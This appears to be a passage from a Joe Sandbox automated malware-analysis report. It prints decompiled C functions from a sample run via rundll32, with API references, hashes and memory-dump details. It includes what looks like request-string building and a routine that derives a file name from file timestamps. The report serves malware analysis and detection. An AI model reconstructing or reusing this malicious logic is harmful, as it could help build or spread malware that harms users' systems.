                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 6f2ddf3c543a7e093814a5cfccc2257eb223ae0ca955b49fd3a4fb9f10525244
                                          • Instruction ID: 3ec123450c3f2bd1cae14ba2f89b88ce050ee614c542247223dd162a288e5125
                                          • Opcode Fuzzy Hash: 6f2ddf3c543a7e093814a5cfccc2257eb223ae0ca955b49fd3a4fb9f10525244
                                          • Instruction Fuzzy Hash: 9DF0D4B4600641DFEB698F64EA59FD63BE5EB18300B04C41CFA42DB351D638EC40CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B6B6E, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E047B6B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E047B58BE(_t2);
				if(_t34 != 0) {
					_t30 = E047B58BE(_t28);
					if(_t30 == 0) {
						E047B147E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E047BA8D2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E047BA8D2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                          0x047b6b6e
                                          0x047b6b78
                                          0x047b6b7a
                                          0x047b6b80
                                          0x047b6b80
                                          0x047b6b89
                                          0x047b6b8d
                                          0x047b6b99
                                          0x047b6b9d
                                          0x047b6c11
                                          0x047b6b9f
                                          0x047b6b9f
                                          0x047b6ba3
                                          0x047b6ba8
                                          0x047b6bad
                                          0x047b6bc7
                                          0x047b6bb6
                                          0x047b6bb6
                                          0x047b6bba
                                          0x047b6bbd
                                          0x047b6bc2
                                          0x047b6bc2
                                          0x047b6bcc
                                          0x047b6bf4
                                          0x047b6bfa
                                          0x047b6bfd
                                          0x047b6bce
                                          0x047b6bd0
                                          0x047b6bd8
                                          0x047b6be3
                                          0x047b6be8
                                          0x047b6be8
                                          0x047b6c04
                                          0x047b6c0b
                                          0x047b6c0c
                                          0x047b6c0c
                                          0x047b6b9d
                                          0x047b6c1c

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,047BA006,?,?,?,?,00000102,047B66AF,?,?,00000000), ref: 047B6B7A
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                            • Part of subcall function 047BA8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,047B6BA8,00000000,00000001,00000001,?,?,047BA006,?,?,?,?,00000102), ref: 047BA8E0
                                            • Part of subcall function 047BA8D2: StrChrA.SHLWAPI(?,0000003F,?,?,047BA006,?,?,?,?,00000102,047B66AF,?,?,00000000,00000000), ref: 047BA8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047BA006,?,?,?,?,00000102,047B66AF,?), ref: 047B6BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047B6BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047B6BF4
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: e72b6bfd8da2778bec2aad6f7ca2650f47184b347a44b90c71f8a478b1aa3cb6
                                          • Instruction ID: 1fb91e830ce39da54814c7c2ac8cb2325985839e6973839f2de7d2a405b1fd68
                                          • Opcode Fuzzy Hash: e72b6bfd8da2778bec2aad6f7ca2650f47184b347a44b90c71f8a478b1aa3cb6
                                          • Instruction Fuzzy Hash: EF21D2B2500255BFDB126FB4C948BEB7FB8DF05384B048064FA849B301E735EA0097E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B5FCB, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E047B5FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E047B58BE(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                          0x047b5fe0
                                          0x047b5fe4
                                          0x047b5fee
                                          0x047b5ff3
                                          0x047b5ff8
                                          0x047b5ffa
                                          0x047b6002
                                          0x047b6007
                                          0x047b6015
                                          0x047b601a
                                          0x047b6024

                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,06CB937C,?,047B694E,004F0053,06CB937C,?,?,?,?,?,?,047B9C10), ref: 047B5FDB
                                          • lstrlenW.KERNEL32(047B694E,?,047B694E,004F0053,06CB937C,?,?,?,?,?,?,047B9C10), ref: 047B5FE2
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,047B694E,004F0053,06CB937C,?,?,?,?,?,?,047B9C10), ref: 047B6002
                                          • memcpy.NTDLL(751469A0,047B694E,00000002,00000000,004F0053,751469A0,?,?,047B694E,004F0053,06CB937C), ref: 047B6015
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: e24bb2d7f3a27e78cd1610726b506d51b33f4e062a48ba89c71f7796fe50b6ed
                                          • Instruction ID: e359a7065b815b0466af28ae09341f50ea014d704e5d8e3b6d4595c984bdc771
                                          • Opcode Fuzzy Hash: e24bb2d7f3a27e78cd1610726b506d51b33f4e062a48ba89c71f7796fe50b6ed
                                          • Instruction Fuzzy Hash: D8F04F72900118BB9F11DFA9CC89DDF7BACEF082587054466FA04D7201E735EE109BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B9DEF, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,047B5335,616D692F,00000000), ref: 047B9DFB
                                          • lstrlen.KERNEL32(?), ref: 047B9E03
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 047B9E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 047B9E25
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 6a6b8c18e313fc5eced3f4ae39bad092fabab8f52a1060e16949cb42fdacb9b6
                                          • Instruction ID: 0b8519122aa05f66ba876648f05b4705e0f18c109cf2b52a85c9a678abf9ed8e
                                          • Opcode Fuzzy Hash: 6a6b8c18e313fc5eced3f4ae39bad092fabab8f52a1060e16949cb42fdacb9b6
                                          • Instruction Fuzzy Hash: BBE01273805A21AF87126BA4AC08DDFBBA9FF892507058D1AF65093214C735D8158BD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: rundll32.exe PID: 5352 Parent PID: 2880 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 04BF32BA, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E04BF32BA(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x4bfd2a0; // 0x59935a40
				_t74 = RtlAllocateHeap( *0x4bfd238, 0, _t72 ^ 0x59935b44);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x4bfd2a0; // 0x59935a40
				_t78 = RtlAllocateHeap( *0x4bfd238, 0, _t76 ^ 0x59935a4d);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x4bfd238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x4bfd2a0; // 0x59935a40
				memset(_t78, 0, _t136 ^ 0x59935a4d);
				_t81 =  *0x4bfd2a4; // 0x24da5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x4bfe7e8; // 0x73797325
				_t83 = E04BF77E6(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x4bfd238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x59935a4d;
				_v28.dwHighDateTime = 0x59935a4d;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x59935a4d) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x4bfd2a4; // 0x24da5a8
				_t16 = _t93 + 0x4bfe809; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                          0x04bf32c3
                                          0x04bf32c9
                                          0x04bf32cb
                                          0x04bf32e5
                                          0x04bf32e7
                                          0x04bf32ec
                                          0x04bf3561
                                          0x04bf3568
                                          0x04bf3568
                                          0x04bf32f2
                                          0x04bf3307
                                          0x04bf3309
                                          0x04bf330b
                                          0x04bf3310
                                          0x04bf3551
                                          0x04bf355b
                                          0x00000000
                                          0x04bf355b
                                          0x04bf3316
                                          0x04bf3321
                                          0x04bf3326
                                          0x04bf332b
                                          0x04bf332e
                                          0x04bf3335
                                          0x04bf333a
                                          0x04bf333f
                                          0x04bf3541
                                          0x04bf354b
                                          0x00000000
                                          0x04bf354b
                                          0x04bf3355
                                          0x04bf3359
                                          0x04bf335c
                                          0x04bf335f
                                          0x04bf3365
                                          0x04bf336a
                                          0x04bf3373
                                          0x04bf3379
                                          0x04bf3383
                                          0x04bf338a
                                          0x04bf338a
                                          0x04bf339c
                                          0x04bf33a7
                                          0x04bf33b5
                                          0x04bf33ba
                                          0x04bf33bf
                                          0x04bf33c2
                                          0x04bf33c7
                                          0x04bf33d1
                                          0x04bf33d4
                                          0x04bf33d7
                                          0x04bf33ed
                                          0x04bf33ef
                                          0x04bf33f4
                                          0x04bf353f
                                          0x00000000
                                          0x04bf353f
                                          0x04bf340b
                                          0x04bf345c
                                          0x04bf341f
                                          0x04bf3427
                                          0x04bf342c
                                          0x04bf343a
                                          0x04bf3443
                                          0x04bf344c
                                          0x04bf344c
                                          0x04bf345a
                                          0x04bf345a
                                          0x04bf3460
                                          0x04bf3464
                                          0x04bf3464
                                          0x04bf346a
                                          0x00000000
                                          0x00000000
                                          0x04bf346c
                                          0x04bf3472
                                          0x04bf3519
                                          0x04bf351c
                                          0x04bf3529
                                          0x04bf3529
                                          0x04bf352d
                                          0x00000000
                                          0x00000000
                                          0x04bf3522
                                          0x04bf3526
                                          0x04bf3526
                                          0x04bf3528
                                          0x04bf3528
                                          0x04bf3532
                                          0x04bf3539
                                          0x04bf353b
                                          0x00000000
                                          0x04bf353b
                                          0x04bf3478
                                          0x04bf347a
                                          0x04bf347a
                                          0x04bf348d
                                          0x04bf3493
                                          0x04bf349e
                                          0x04bf34a0
                                          0x04bf34a4
                                          0x04bf34a6
                                          0x04bf34a6
                                          0x04bf34ab
                                          0x04bf34ad
                                          0x04bf34ad
                                          0x04bf34ab
                                          0x04bf34b2
                                          0x04bf34b6
                                          0x04bf34b6
                                          0x04bf34c6
                                          0x04bf34cb
                                          0x04bf34ce
                                          0x04bf34ce
                                          0x04bf34d1
                                          0x04bf34db
                                          0x04bf34e3
                                          0x04bf34e8
                                          0x04bf34f6
                                          0x04bf34f6
                                          0x04bf350a
                                          0x04bf350e
                                          0x04bf350e

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 04BF32E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04BF3307
                                          • memset.NTDLL ref: 04BF3321
                                            • Part of subcall function 04BF77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,04BF333A,73797325), ref: 04BF77F7
                                            • Part of subcall function 04BF77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04BF7811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04BF335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04BF3373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 04BF338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04BF3396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 04BF33D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04BF33ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 04BF340B
                                          • FindNextFileA.KERNELBASE(04BF207E,?), ref: 04BF341F
                                          • FindClose.KERNEL32(04BF207E), ref: 04BF342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04BF3438
                                          • CompareFileTime.KERNEL32(?,?), ref: 04BF345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 04BF348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 04BF34C6
                                          • FindNextFileA.KERNELBASE(04BF207E,?), ref: 04BF34DB
                                          • FindClose.KERNEL32(04BF207E), ref: 04BF34E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04BF34F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 04BF3504
                                          • FindClose.KERNEL32(04BF207E), ref: 04BF3539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 04BF354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 04BF355B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: 3a9d0d2214d893b17a8099cc3019afb5b67f61f85fde00f4f3cbf19cc045ef12
                                          • Instruction ID: 9fae6c2616e44b66202dde2b0ea923bc67f21ce87c922fef9fed15d8b6a79a72
                                          • Opcode Fuzzy Hash: 3a9d0d2214d893b17a8099cc3019afb5b67f61f85fde00f4f3cbf19cc045ef12
                                          • Instruction Fuzzy Hash: D0811C71900119AFDF11DFA9DC84AEEBBF9FF44300F1045AAEA09E7250D735AA49CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF71B9, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E04BF71B9(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04BF58BE(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04BF147E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                          0x04bf71c6
                                          0x04bf71c7
                                          0x04bf71c8
                                          0x04bf71c9
                                          0x04bf71ca
                                          0x04bf71ce
                                          0x04bf71d5
                                          0x04bf71e4
                                          0x04bf71e7
                                          0x04bf71ea
                                          0x04bf71f1
                                          0x04bf71f4
                                          0x04bf71f7
                                          0x04bf71fa
                                          0x04bf71fd
                                          0x04bf7208
                                          0x04bf720a
                                          0x04bf7213
                                          0x04bf721b
                                          0x04bf721d
                                          0x04bf722f
                                          0x04bf7239
                                          0x04bf723d
                                          0x04bf724c
                                          0x04bf7250
                                          0x04bf7259
                                          0x04bf7261
                                          0x04bf7261
                                          0x04bf7263
                                          0x04bf7263
                                          0x04bf726b
                                          0x04bf7271
                                          0x04bf7275
                                          0x04bf7275
                                          0x04bf7280

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04BF7200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04BF7213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04BF722F
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04BF724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 04BF7259
                                          • NtClose.NTDLL(?), ref: 04BF726B
                                          • NtClose.NTDLL(00000000), ref: 04BF7275
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 5bcd75721600747d1d41b724a65590542669ca723d5781aa25fba3a6ee01134e
                                          • Instruction ID: 485bf28c5ebc336dd4f0c0bb100a365c254dc12c8447a6c13f7e2e9ab200e11d
                                          • Opcode Fuzzy Hash: 5bcd75721600747d1d41b724a65590542669ca723d5781aa25fba3a6ee01134e
                                          • Instruction Fuzzy Hash: 482105B290021CBBDF019F98CC859DEBFBDFF58740F104062FA08A6110D7759B659BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF1754, Relevance: 33.2, APIs: 22, Instructions: 248memorystringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04BF1754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t68;
				intOrPtr _t69;
				int _t72;
				void* _t73;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr _t95;
				void* _t97;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				signed int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				CHAR* _t136;
				intOrPtr _t137;
				void* _t138;
				void* _t147;
				int _t148;
				void* _t149;
				intOrPtr _t150;
				void* _t152;
				long _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t161;
				void* _t162;
				void* _t164;

				_t147 = __edx;
				_t138 = __ecx;
				_t60 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t60 = GetTickCount();
				}
				_t61 =  *0x4bfd018; // 0x3df0b315
				asm("bswap eax");
				_t62 =  *0x4bfd014; // 0x3a87c8cd
				_t136 = _a16;
				asm("bswap eax");
				_t63 =  *0x4bfd010; // 0xd8d2f808
				asm("bswap eax");
				_t64 =  *0x4bfd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t65 =  *0x4bfd2a4; // 0x24da5a8
				_t3 = _t65 + 0x4bfe633; // 0x74666f73
				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x4bfd02c,  *0x4bfd004, _t60);
				_t68 = E04BF57AB();
				_t69 =  *0x4bfd2a4; // 0x24da5a8
				_t4 = _t69 + 0x4bfe673; // 0x74707526
				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
				_t164 = _t162 + 0x38;
				_t149 = _t148 + _t72; // executed
				_t73 = E04BF73E9(_t138); // executed
				_t137 = __imp__;
				_v8 = _t73;
				if(_t73 != 0) {
					_t130 =  *0x4bfd2a4; // 0x24da5a8
					_t7 = _t130 + 0x4bfe8cb; // 0x736e6426
					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
					_t164 = _t164 + 0xc;
					_t149 = _t149 + _t134;
					HeapFree( *0x4bfd238, 0, _v8);
				}
				_t74 = E04BF614A();
				_v8 = _t74;
				if(_t74 != 0) {
					_t125 =  *0x4bfd2a4; // 0x24da5a8
					_t11 = _t125 + 0x4bfe8d3; // 0x6f687726
					wsprintfA(_t149 + _a16, _t11, _t74);
					_t164 = _t164 + 0xc;
					HeapFree( *0x4bfd238, 0, _v8);
				}
				_t150 =  *0x4bfd324; // 0x70d95b0
				_t76 = E04BF757B(0x4bfd00a, _t150 + 4);
				_t156 = 0;
				_v20 = _t76;
				if(_t76 == 0) {
					L26:
					RtlFreeHeap( *0x4bfd238, _t156, _a16); // executed
					return _v12;
				} else {
					_t79 = RtlAllocateHeap( *0x4bfd238, 0, 0x800);
					_v8 = _t79;
					if(_t79 == 0) {
						L25:
						HeapFree( *0x4bfd238, _t156, _v20);
						goto L26;
					}
					E04BF749F(GetTickCount());
					_t83 =  *0x4bfd324; // 0x70d95b0
					__imp__(_t83 + 0x40);
					asm("lock xadd [eax], ecx");
					_t87 =  *0x4bfd324; // 0x70d95b0
					__imp__(_t87 + 0x40);
					_t89 =  *0x4bfd324; // 0x70d95b0
					_t152 = E04BF4D2C(1, _t147, _a16,  *_t89);
					_v28 = _t152;
					asm("lock xadd [eax], ecx");
					if(_t152 == 0) {
						L24:
						HeapFree( *0x4bfd238, _t156, _v8);
						goto L25;
					}
					StrTrimA(_t152, 0x4bfc294);
					_t95 =  *0x4bfd2a4; // 0x24da5a8
					_push(_t152);
					_t18 = _t95 + 0x4bfe252; // 0x616d692f
					_t97 = E04BF9DEF(_t18);
					_v16 = _t97;
					if(_t97 == 0) {
						L23:
						HeapFree( *0x4bfd238, _t156, _t152);
						goto L24;
					}
					_t157 = __imp__;
